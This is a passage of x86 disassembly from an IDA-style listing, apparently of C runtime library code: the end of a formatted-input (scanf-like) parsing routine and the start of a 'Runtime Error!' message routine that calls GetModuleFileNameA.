		mov	al, [ebp+18Ch+var_1A4]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4098CB
; ---------------------------------------------------------------------------

loc_409884:				; CODE XREF: sub_409427+4ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4098D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4098CB:				; CODE XREF: sub_409427+45Bj
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_409884

loc_4098D6:				; CODE XREF: sub_409427+40Cj
					; sub_409427+41Aj ...
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_4099D6
		cmp	[ebp+18Ch+var_190], 65h
		jz	short loc_4098F0
		cmp	[ebp+18Ch+var_190], 45h
		jnz	loc_4099D6

loc_4098F0:				; CODE XREF: sub_409427+4BDj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4099D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 65h
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	eax, 2Dh
		mov	[ebp+18Ch+var_190], eax
		jnz	short loc_40995B
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 2Dh
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		jmp	short loc_409961
; ---------------------------------------------------------------------------

loc_40995B:				; CODE XREF: sub_409427+50Fj
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_40997E

loc_409961:				; CODE XREF: sub_409427+532j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jnz	short loc_409970
		and	[ebp+18Ch+var_198], eax
		jmp	short loc_40997E
; ---------------------------------------------------------------------------

loc_409970:				; CODE XREF: sub_409427+542j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax

loc_40997E:				; CODE XREF: sub_409427+538j
					; sub_409427+547j
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4099CB
; ---------------------------------------------------------------------------

loc_409984:				; CODE XREF: sub_409427+5ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4099D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4099CB:				; CODE XREF: sub_409427+55Bj
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_409984

loc_4099D6:				; CODE XREF: sub_409427+4B3j
					; sub_409427+4C3j ...
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jz	short loc_4099EC
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_4099EC:				; CODE XREF: sub_409427+5B6j
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		mov	eax, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1C8]
		lea	ecx, [ebp+18Ch+var_1F8]
		push	ecx
		push	eax
		push	[ebp+18Ch+var_1C4]
		mov	byte ptr [ebx+eax], 0
		movsx	eax, [ebp+18Ch+var_19A]
		dec	eax
		push	eax
		push	off_424F9C
		call	sub_405753
		pop	ecx
		call	eax
		add	esp, 10h
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409A2E:				; CODE XREF: sub_409427+31Bj
		test	ecx, ecx
		jnz	short loc_409A3C
		inc	[ebp+18Ch+var_198]
		mov	[ebp+18Ch+var_1B8], 1

loc_409A3C:				; CODE XREF: sub_409427+609j
					; sub_409427+723j
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409A46
		mov	[ebp+18Ch+var_1A2], 1

loc_409A46:				; CODE XREF: sub_409427+619j
					; sub_409427+823j
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		mov	edi, esi
		jz	short loc_409A5E
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409A5E:				; CODE XREF: sub_409427+628j
					; sub_409427+8E6j ...
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409A72
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_409D2B

loc_409A72:				; CODE XREF: sub_409427+63Bj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_409D18
		cmp	ebx, 63h
		jz	short loc_409AD7
		cmp	ebx, 73h
		jnz	short loc_409AA6
		cmp	eax, 9
		jl	short loc_409AA1
		cmp	eax, 0Dh
		jle	loc_409D18

loc_409AA1:				; CODE XREF: sub_409427+66Fj
		cmp	eax, 20h
		jnz	short loc_409AD7

loc_409AA6:				; CODE XREF: sub_409427+66Aj
		cmp	ebx, 7Bh
		jnz	loc_409D18
		movsx	ebx, [ebp+18Ch+var_1A4]
		xor	edx, edx
		mov	ecx, eax
		and	ecx, 7
		inc	edx
		shl	edx, cl
		mov	ecx, eax
		sar	ecx, 3
		movsx	ecx, [ebp+ecx+18Ch+var_24]
		xor	ecx, ebx
		test	edx, ecx
		mov	ebx, [ebp+18Ch+var_1AC]
		jz	loc_409D18

loc_409AD7:				; CODE XREF: sub_409427+665j
					; sub_409427+67Dj
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409D12
		cmp	[ebp+18Ch+var_1A2], 0
		jz	loc_409D07
		mov	[ebp+18Ch+var_1DC], al
		movzx	eax, al
		push	eax
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jz	short loc_409B0A
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_1DB], al

loc_409B0A:				; CODE XREF: sub_409427+6D3j
		lea	eax, [ebp+18Ch+var_1F8]
		push	eax
		mov	eax, [ebp+18Ch+var_1F8]
		mov	[ebp+18Ch+var_1E8], 3Fh
		push	dword ptr [eax+0ACh]
		lea	eax, [ebp+18Ch+var_1DC]
		push	eax
		lea	eax, [ebp+18Ch+var_1E8]
		push	eax
		call	sub_40F97D
		mov	ax, word ptr [ebp+18Ch+var_1E8]
		add	esp, 10h
		mov	[esi], ax
		inc	esi
		inc	esi
		jmp	loc_409D0A
; ---------------------------------------------------------------------------

loc_409B3C:				; CODE XREF: sub_409427+30Cj
		mov	eax, ebx
		sub	eax, 70h
		jz	loc_409D63
		sub	eax, 3
		jz	loc_409A3C
		dec	eax
		dec	eax
		jz	loc_409D67
		sub	eax, 3
		jz	loc_409781
		sub	eax, 3
		jz	short loc_409B8A

loc_409B66:				; CODE XREF: sub_409427+32Cj
					; sub_409427+33Fj
		movzx	eax, byte ptr [edi]
		cmp	eax, [ebp+18Ch+var_190]
		jnz	loc_409FF1
		dec	[ebp+18Ch+var_1A1]
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		mov	eax, [ebp+18Ch+var_1FC]
		mov	[ebp+18Ch+var_1E4], eax
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409B8A:				; CODE XREF: sub_409427+73Dj
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409B94
		mov	[ebp+18Ch+var_1A2], 1

loc_409B94:				; CODE XREF: sub_409427+767j
		inc	edi
		cmp	byte ptr [edi],	5Eh
		mov	esi, edi
		jnz	short loc_409BA3
		lea	esi, [edi+1]
		mov	[ebp+18Ch+var_1A4], 0FFh

loc_409BA3:				; CODE XREF: sub_409427+773j
		push	20h
		lea	eax, [ebp+18Ch+var_24]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		cmp	byte ptr [esi],	5Dh
		jnz	short loc_409BC7
		mov	dl, 5Dh
		inc	esi
		mov	[ebp+18Ch+var_19], 20h
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409BC7:				; CODE XREF: sub_409427+792j
		mov	dl, [ebp+18Ch+var_1C9]
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409BCC:				; CODE XREF: sub_409427+813j
		inc	esi
		cmp	al, 2Dh
		jnz	short loc_409C19
		test	dl, dl
		jz	short loc_409C19
		mov	cl, [esi]
		cmp	cl, 5Dh
		jz	short loc_409C19
		inc	esi
		cmp	dl, cl
		jnb	short loc_409BE5
		mov	al, cl
		jmp	short loc_409BE9
; ---------------------------------------------------------------------------

loc_409BE5:				; CODE XREF: sub_409427+7B8j
		mov	al, dl
		mov	dl, cl

loc_409BE9:				; CODE XREF: sub_409427+7BCj
		cmp	dl, al
		ja	short loc_409C15
		sub	al, dl
		inc	al
		movzx	edi, dl
		movzx	edx, al

loc_409BF7:				; CODE XREF: sub_409427+7E9j
		mov	ecx, edi
		and	ecx, 7
		mov	eax, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		inc	edi
		dec	edx
		jnz	short loc_409BF7
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409C15:				; CODE XREF: sub_409427+7C4j
		xor	dl, dl
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409C19:				; CODE XREF: sub_409427+7A8j
					; sub_409427+7ACj ...
		movzx	ecx, al
		mov	dl, al
		mov	eax, ecx
		and	ecx, 7
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409C36:				; CODE XREF: sub_409427+79Ej
					; sub_409427+7A3j ...
		mov	al, [esi]
		cmp	al, 5Dh
		jnz	short loc_409BCC
		test	al, al
		jz	loc_40A019
		mov	[ebp+18Ch+var_1B4], esi
		mov	esi, [ebp+18Ch+var_1C4]
		jmp	loc_409A46
; ---------------------------------------------------------------------------

loc_409C4F:				; CODE XREF: sub_409427+360j
		cmp	ebx, 2Bh
		jnz	short loc_409C73

loc_409C54:				; CODE XREF: sub_409427+36Aj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409C63
		test	ecx, ecx
		jz	short loc_409C63
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409C73
; ---------------------------------------------------------------------------

loc_409C63:				; CODE XREF: sub_409427+830j
					; sub_409427+834j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx

loc_409C73:				; CODE XREF: sub_409427+82Bj
					; sub_409427+83Aj
		cmp	ebx, 30h
		jnz	loc_409D99
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		cmp	bl, 78h
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409CD8
		cmp	bl, 58h
		jz	short loc_409CD8
		cmp	[ebp+18Ch+var_1AC], 78h
		mov	[ebp+18Ch+var_1A8], 1
		jz	short loc_409CBD
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409CB1
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409CB1
		inc	[ebp+18Ch+var_189]

loc_409CB1:				; CODE XREF: sub_409427+880j
					; sub_409427+885j
		mov	[ebp+18Ch+var_1AC], 6Fh
		jmp	loc_409D99
; ---------------------------------------------------------------------------

loc_409CBD:				; CODE XREF: sub_409427+87Aj
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409CD0
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409CD0:				; CODE XREF: sub_409427+89Cj
		push	30h
		pop	ebx
		jmp	loc_409D96
; ---------------------------------------------------------------------------

loc_409CD8:				; CODE XREF: sub_409427+868j
					; sub_409427+86Dj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	[ebp+18Ch+var_1B8], 0
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409CFB
		sub	[ebp+18Ch+var_198], 2
		cmp	[ebp+18Ch+var_198], 1
		jge	short loc_409CFB
		inc	[ebp+18Ch+var_189]

loc_409CFB:				; CODE XREF: sub_409427+8C5j
					; sub_409427+8CFj
		mov	[ebp+18Ch+var_1AC], 78h
		jmp	loc_409D99
; ---------------------------------------------------------------------------

loc_409D07:				; CODE XREF: sub_409427+6BEj
		mov	[esi], al
		inc	esi

loc_409D0A:				; CODE XREF: sub_409427+710j
		mov	[ebp+18Ch+var_1C4], esi
		jmp	loc_409A5E
; ---------------------------------------------------------------------------

loc_409D12:				; CODE XREF: sub_409427+6B4j
		inc	edi
		jmp	loc_409A5E
; ---------------------------------------------------------------------------

loc_409D18:				; CODE XREF: sub_409427+65Cj
					; sub_409427+674j ...
		dec	[ebp+18Ch+var_188]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_409D2B
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409D2B:				; CODE XREF: sub_409427+645j
					; sub_409427+8F7j
		cmp	edi, esi
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		inc	[ebp+18Ch+var_1C8]
		cmp	ebx, 63h
		jz	loc_409F81
		cmp	[ebp+18Ch+var_1A2], 0
		mov	eax, [ebp+18Ch+var_1C4]
		jz	short loc_409D5B
		and	word ptr [eax],	0
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409D5B:				; CODE XREF: sub_409427+929j
		mov	byte ptr [eax],	0
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409D63:				; CODE XREF: sub_409427+71Aj
		mov	[ebp+18Ch+var_19A], 1

loc_409D67:				; CODE XREF: sub_409427+312j
					; sub_409427+326j ...
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	short loc_409D75
		mov	[ebp+18Ch+var_1A3], 1
		jmp	short loc_409D7A
; ---------------------------------------------------------------------------

loc_409D75:				; CODE XREF: sub_409427+946j
		cmp	ebx, 2Bh
		jnz	short loc_409D99

loc_409D7A:				; CODE XREF: sub_409427+94Cj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409D89
		test	ecx, ecx
		jz	short loc_409D89
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409D99
; ---------------------------------------------------------------------------

loc_409D89:				; CODE XREF: sub_409427+956j
					; sub_409427+95Aj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax

loc_409D96:				; CODE XREF: sub_409427+8ACj
		mov	[ebp+18Ch+var_190], ebx

loc_409D99:				; CODE XREF: sub_409427+84Fj
					; sub_409427+891j ...
		cmp	[ebp+18Ch+var_1D4], 0
		jz	loc_409E9E
		cmp	[ebp+18Ch+var_189], 0
		jnz	loc_409E79

loc_409DAD:				; CODE XREF: sub_409427+A3Aj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409E02
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409E02
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	loc_409E66
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409DEC
		cmp	ebx, 38h
		jge	loc_409E66
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 3
		shl	esi, 3
		mov	[ebp+18Ch+var_1BC], eax
		jmp	short loc_409E37
; ---------------------------------------------------------------------------

loc_409DEC:				; CODE XREF: sub_409427+9A8j
		push	0
		push	0Ah
		push	[ebp+18Ch+var_1BC]
		push	[ebp+18Ch+var_1C0]
		call	sub_40FAB0
		mov	esi, eax
		mov	[ebp+18Ch+var_1BC], edx
		jmp	short loc_409E37
; ---------------------------------------------------------------------------

loc_409E02:				; CODE XREF: sub_409427+98Aj
					; sub_409427+990j
		movzx	edi, bl
		push	edi
		call	sub_40F7BC
		test	eax, eax
		pop	ecx
		jz	short loc_409E66
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 4
		push	edi
		shl	esi, 4
		mov	[ebp+18Ch+var_1BC], eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409E34
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409E34:				; CODE XREF: sub_409427+A05j
		mov	[ebp+18Ch+var_190], ebx

loc_409E37:				; CODE XREF: sub_409427+9C3j
					; sub_409427+9D9j
		inc	[ebp+18Ch+var_1A8]
		lea	eax, [ebx-30h]
		cdq
		add	esi, eax
		adc	[ebp+18Ch+var_1BC], edx
		cmp	[ebp+18Ch+var_1B8], 0
		mov	[ebp+18Ch+var_1C0], esi
		jz	short loc_409E51
		dec	[ebp+18Ch+var_198]
		jz	short loc_409E79

loc_409E51:				; CODE XREF: sub_409427+A23j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	loc_409DAD
; ---------------------------------------------------------------------------

loc_409E66:				; CODE XREF: sub_409427+99Ej
					; sub_409427+9ADj ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409E79
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409E79:				; CODE XREF: sub_409427+980j
					; sub_409427+A28j ...
		cmp	[ebp+18Ch+var_1A3], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jz	loc_409F41
		mov	eax, [ebp+18Ch+var_1C0]
		mov	ecx, [ebp+18Ch+var_1BC]
		neg	eax
		adc	ecx, 0
		neg	ecx
		mov	[ebp+18Ch+var_1C0], eax
		mov	[ebp+18Ch+var_1BC], ecx
		jmp	loc_409F41
; ---------------------------------------------------------------------------

loc_409E9E:				; CODE XREF: sub_409427+976j
		cmp	[ebp+18Ch+var_189], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jnz	loc_409F39

loc_409EAB:				; CODE XREF: sub_409427+AFDj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409EDA
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409EDA
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	short loc_409F26
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409ED5
		cmp	ebx, 38h
		jge	short loc_409F26
		shl	edi, 3
		jmp	short loc_409F02
; ---------------------------------------------------------------------------

loc_409ED5:				; CODE XREF: sub_409427+AA2j
		imul	edi, 0Ah
		jmp	short loc_409F02
; ---------------------------------------------------------------------------

loc_409EDA:				; CODE XREF: sub_409427+A88j
					; sub_409427+A8Ej
		movzx	esi, bl
		push	esi
		call	sub_40F7BC
		test	eax, eax
		pop	ecx
		jz	short loc_409F26
		push	esi
		shl	edi, 4
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409EFF
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409EFF:				; CODE XREF: sub_409427+AD0j
		mov	[ebp+18Ch+var_190], ebx

loc_409F02:				; CODE XREF: sub_409427+AACj
					; sub_409427+AB1j
		inc	[ebp+18Ch+var_1A8]
		cmp	[ebp+18Ch+var_1B8], 0
		lea	edi, [edi+ebx-30h]
		jz	short loc_409F14
		dec	[ebp+18Ch+var_198]
		jz	short loc_409F39

loc_409F14:				; CODE XREF: sub_409427+AE6j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	short loc_409EAB
; ---------------------------------------------------------------------------

loc_409F26:				; CODE XREF: sub_409427+A9Cj
					; sub_409427+AA7j ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409F39
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409F39:				; CODE XREF: sub_409427+A7Ej
					; sub_409427+AEBj ...
		cmp	[ebp+18Ch+var_1A3], 0
		jz	short loc_409F41
		neg	edi

loc_409F41:				; CODE XREF: sub_409427+A59j
					; sub_409427+A72j ...
		cmp	[ebp+18Ch+var_1AC], 46h
		jnz	short loc_409F4B
		and	[ebp+18Ch+var_1A8], 0

loc_409F4B:				; CODE XREF: sub_409427+B1Ej
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	short loc_409F81
		inc	[ebp+18Ch+var_1C8]
		mov	esi, [ebp+18Ch+var_1C4]

loc_409F61:				; CODE XREF: sub_409427+34Cj
		cmp	[ebp+18Ch+var_1D4], 0
		jz	short loc_409F74
		mov	eax, [ebp+18Ch+var_1C0]
		mov	[esi], eax
		mov	eax, [ebp+18Ch+var_1BC]
		mov	[esi+4], eax
		jmp	short loc_409F81
; ---------------------------------------------------------------------------

loc_409F74:				; CODE XREF: sub_409427+B3Ej
		cmp	[ebp+18Ch+var_19A], 0
		jz	short loc_409F7E
		mov	[esi], edi
		jmp	short loc_409F81
; ---------------------------------------------------------------------------

loc_409F7E:				; CODE XREF: sub_409427+B51j
		mov	[esi], di

loc_409F81:				; CODE XREF: sub_409427+352j
					; sub_409427+5D3j ...
		mov	edi, [ebp+18Ch+var_1B4]
		inc	[ebp+18Ch+var_1A1]
		inc	edi
		mov	[ebp+18Ch+var_1B4], edi
		jmp	short loc_409FCF
; ---------------------------------------------------------------------------

loc_409F8D:				; CODE XREF: sub_409427+17Cj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		movzx	eax, byte ptr [edi]
		inc	edi
		cmp	eax, ebx
		mov	[ebp+18Ch+var_190], ebx
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_40A007
		movzx	eax, bl
		push	eax
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jz	short loc_409FCF
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		movzx	ecx, byte ptr [edi]
		inc	edi
		cmp	ecx, eax
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_409FF7
		dec	[ebp+18Ch+var_188]

loc_409FCF:				; CODE XREF: sub_409427+B64j
					; sub_409427+B8Dj
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_409FE5
		cmp	byte ptr [edi],	25h
		jnz	short loc_40A019
		mov	eax, [ebp+18Ch+var_1B4]
		cmp	byte ptr [eax+1], 6Eh
		jnz	short loc_40A019
		mov	edi, eax

loc_409FE5:				; CODE XREF: sub_409427+174j
					; sub_409427+BACj
		mov	al, [edi]
		test	al, al
		jnz	loc_40955F
		jmp	short loc_40A019
; ---------------------------------------------------------------------------

loc_409FF1:				; CODE XREF: sub_409427+303j
					; sub_409427+745j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jmp	short loc_40A00A
; ---------------------------------------------------------------------------

loc_409FF7:				; CODE XREF: sub_409427+BA3j
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40A007
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40A007:				; CODE XREF: sub_409427+B7Fj
					; sub_409427+BD3j
		cmp	ebx, 0FFFFFFFFh

loc_40A00A:				; CODE XREF: sub_409427+BCEj
		jz	short loc_40A019
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40A019:				; CODE XREF: sub_409427+2ECj
					; sub_409427+3D7j ...
		cmp	[ebp+18Ch+var_1D0], 1
		jnz	short loc_40A028
		push	[ebp+18Ch+var_1B0]
		call	sub_403B91
		pop	ecx

loc_40A028:				; CODE XREF: sub_409427+BF6j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_40A04C
		mov	eax, [ebp+18Ch+var_1C8]
		test	eax, eax
		jnz	short loc_40A03D
		cmp	[ebp+18Ch+var_1A1], al
		jnz	short loc_40A03D
		or	eax, 0FFFFFFFFh

loc_40A03D:				; CODE XREF: sub_409427+C0Cj
					; sub_409427+C11j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_40A05C
		mov	ecx, [ebp+18Ch+var_1F0]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40A05C
; ---------------------------------------------------------------------------

loc_40A04C:				; CODE XREF: sub_409427+12Fj
					; sub_409427+C05j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_40A059
		mov	eax, [ebp+18Ch+var_1F0]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40A059:				; CODE XREF: sub_409427+C29j
		mov	eax, [ebp+18Ch+var_1C8]

loc_40A05C:				; CODE XREF: sub_409427+70j
					; sub_409427+C1Aj ...
		mov	ecx, [ebp+18Ch+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 18Ch
		leave
		retn
sub_409427	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A074	proc near		; CODE XREF: sub_403C6E+2Ap
					; sub_40449D+12p ...

var_4		= byte ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		mov	ebx, [esp+8+arg_0]
		push	esi
		push	edi
		xor	esi, esi
		xor	edi, edi

loc_40A080:				; CODE XREF: sub_40A074+19j
		cmp	ebx, dword_424C00[edi*8]
		jz	short loc_40A08F
		inc	edi
		cmp	edi, 17h
		jl	short loc_40A080

loc_40A08F:				; CODE XREF: sub_40A074+13j
		cmp	edi, 17h
		jnb	loc_40A20F
		push	ebp
		push	3
		call	sub_40FC82
		cmp	eax, 1
		pop	ecx
		jz	loc_40A1DB
		push	3
		call	sub_40FC82
		test	eax, eax
		pop	ecx
		jnz	short loc_40A0C3
		cmp	dword_424050, 1
		jz	loc_40A1DB

loc_40A0C3:				; CODE XREF: sub_40A074+40j
		cmp	ebx, 0FCh
		jz	loc_40A20E
		push	offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
		mov	ebx, 314h
		push	ebx
		mov	ebp, offset dword_428338
		push	ebp
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A0F9
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A0F9:				; CODE XREF: sub_40A074+76j
		push	104h
		mov	esi, offset byte_428351
		push	esi
		push	0
		mov	byte_428455, 0
		call	ds:dword_41E060	; GetModuleFileNameA
		test	eax, eax
		jnz	short loc_40A13D
		push	offset aProgramNameUnk ; "<program name	unknown>"
		push	2FBh
		push	esi
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A13D
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4033CB
